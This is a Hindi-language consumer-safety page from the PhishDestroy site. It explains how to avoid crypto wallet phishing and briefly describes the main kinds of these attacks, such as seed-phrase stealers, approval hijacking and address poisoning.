फ़ॉन्टावesomeकिट bdc3291137 (#7)फ़ॉन्टावesome दुरुपयोग
चेनअभ्यूससभी फ़िशिंग अभियानचीनअत्याचार.कॉम

खुद को कैसे सुरक्षित रखें

स्वर्ण नियम

कोई भी वैध सेवा कभी भी आपसे अपनी सीड फ़्रेज़ वेबसाइट में टाइप करने के लिए नहीं कहेगी। सीड फ़्रेज़ केवल वॉलेट रिकवरी के दौरान आधिकारिक वॉलेट सॉफ़्टवेयर में ही डाले जाते हैं — कभी भी तीसरे पक्ष की "प्रमाणीकरण", "सिंक्रोनाइज़ेशन", या "रिकवरी" वेबसाइटों पर नहीं।

किसी भी वॉलेट को कनेक्ट करने से पहले:

  • यह सत्यापित करें कि URL आधिकारिक डोमेन से मेल खाता है। SSL प्रमाणपत्र का विवरण जांचें।
  • असली WalletConnect QR कोड या डीप लिंक का उपयोग करता है — कभी भी सीड फ़्रेज़ फ़ॉर्म का नहीं।
  • यदि "कनेक्शन विफल" हो जाए और आपसे मैन्युअल रूप से क्रेडेंशियल दर्ज करने के लिए कहा जाए — तो यह फ़िशिंग है।
  • संदिग्ध यूआरएल की जाँच करें फ़िशटैंक या वायरसटोटल संवाद करने से पहले।
  • हार्डवेयर वॉलेट का उपयोग करें — यह प्रत्येक लेनदेन के लिए भौतिक पुष्टि की आवश्यकता होती है।
  • आधिकारिक यूआरएल को बुकमार्क करें। विज्ञापनों, डीएम या सोशल मीडिया से आने वाले लिंक पर कभी क्लिक न करें।

क्रिप्टो फ़िशिंग वर्गीकरण

सीड फ़्रेज़ चोर केवल एक श्रेणी हैं। यहाँ क्रिप्टो फ़िशिंग का पूरा परिदृश्य है — हम प्रत्येक प्रकार में गहन विश्लेषण जोड़ेंगे।

सीड फ़्रेज़ चोर
नकली "कनेक्ट वॉलेट" पेज जो आपको अपना रिकवरी वाक्यांश टाइप करने के लिए धोखा देते हैं। इस लेख का मुख्य फोकस — 5 वास्तविक उदाहरणों का विश्लेषण।
ऊपर कवर किया गया
अनुमोदन अपहरण
दुर्भावनापूर्ण dApps जो MetaMask के माध्यम से असीमित टोकन अनुमोदन मांगते हैं। एक बार अनुमोदन मिल जाने पर, हमलावर आपके सीड फ्रेज की आवश्यकता के बिना आपके वॉलेट को खाली कर देता है।
जल्द आ रहा है
आइस फिशिंग (परमिट2)
EIP-2612 गैसलेस परमिट्स का शोषण। पीड़ित एक ऑफ-चेन संदेश पर हस्ताक्षर करता है जो टोकन स्थानांतरण अधिकार प्रदान करता है — ड्रेन तक कोई ऑन-चेन अनुमोदन दिखाई नहीं देता।
जल्द आ रहा है
नकली एयरड्रॉप दावे
दुर्भावनापूर्ण स्मार्ट कॉन्ट्रैक्ट के माध्यम से "दावा" करने की आवश्यकता वाले नकली टोकन एयरड्रॉप्स। दावा लेनदेन वास्तव में आपके असली टोकन बाहर भेज देता है।
जल्द आ रहा है
क्लिपबोर्ड हाईजैकर्स
एक मैलवेयर जो आपके क्लिपबोर्ड की निगरानी करता है और पेस्ट करने से पहले चुपचाप कॉपी किए गए वॉलेट पतों को हमलावर के पते से बदल देता है।
जल्द आ रहा है
धूल हटाना + विषाक्त करना
एक जैसे दिखने वाले पतों से होने वाले छोटे-छोटे लेनदेन आपके इतिहास को दूषित करते हैं। पीड़ित अपने अगले ट्रांसफर के लिए लेनदेन इतिहास से नकली पता कॉपी कर लेता है।
जल्द आ रहा है

असहज सत्य

क्रिप्टो फ़िशिंग ऑपरेशन स्थापित करने की लागत $0 और लेता है 30 मिनट से कम. मुफ्त होस्टिंग, मुफ्त फॉर्म सेवाएँ, मुफ्त मैसेजिंग बॉट्स। साइट #1 के पीछे का हमलावर पहले ही से क्रेडेंशियल्स इकट्ठा कर चुका है १,८२४+ पीड़ित. साइट #4 चल रही है भुगतान विज्ञापन मापने के लिए। यह शौकिया समय नहीं है — यह एक उद्योग है। एकमात्र रक्षा जागरूकता है।

हमारी लड़ाई में हमारा साथ दें

PhishDestroy क्रिप्टो फ़िशिंग साइटों को रीयल-टाइम में ट्रैक और रिपोर्ट करता है। यदि आप किसी संदिग्ध साइट का सामना करते हैं, तो हमें रिपोर्ट करें — हम इसकी जांच करेंगे और उसे बंद कराने के लिए काम करेंगे।

संबंधित जांचें

जांच
xmrwallet.com का अंत: नेमसाइलो ने एक बड़े चोर की रक्षा के लिए झूठ बोला
10-वर्षीय मोनेरो चोरी। 3 रजिस्ट्रारों ने कार्य किया। NameSilo ने 7 झूठ गढ़े।
गहन विश्लेषण
क्रिप्टो ड्रेनर नेटवर्क: बुनियादी ढांचा बेनकाब
ड्रेनर-एज़-ए-सर्विस संचालन कैसे बुनियादी ढांचे और ऑपरेटरों को साझा करते हैं।
पैनल उजागर
ट्रस्ट वॉलेट फ़िशिंग पैनल: पूर्ण एडमिन एक्सेस
हमने एक ट्रस्ट वॉलेट फ़िशिंग ऑपरेशन के एडमिन पैनल तक पहुँच प्राप्त की।
अवसंरचना
घोटाला अवसंरचना बेनकाब: साझा बैकएंड्स
धोखाधड़ी के संचालन कैसे सर्वर, टेम्पलेट और भुगतान प्रवाह साझा करते हैं।

इस जांच को साझा करें

एक्स / ट्विटर टेलीग्राम रेडिट लिंक्डइन

संबंधित जांचें

ट्रस्ट वॉलेट फ़िशिंग पैनल: $239K चोरी, 6 ऑपरेटर
गहन जांच
ट्रस्ट वॉलेट फ़िशिंग पैनल: $239K चोरी, 6 ऑपरेटर
क्रिप्टो ड्रेनर टूलकिट: एंजेल ड्रेनर पुनर्विक्रेता बेनकाब
गहन जांच
क्रिप्टो ड्रेनर टूलकिट: एंजेल ड्रेनर पुनर्विक्रेता बेनकाब
ठग बेनकाब: 4 घोटाला बैकएंड्स का विश्लेषण
जांच
ठग बेनकाब: 4 घोटाला बैकएंड्स का विश्लेषण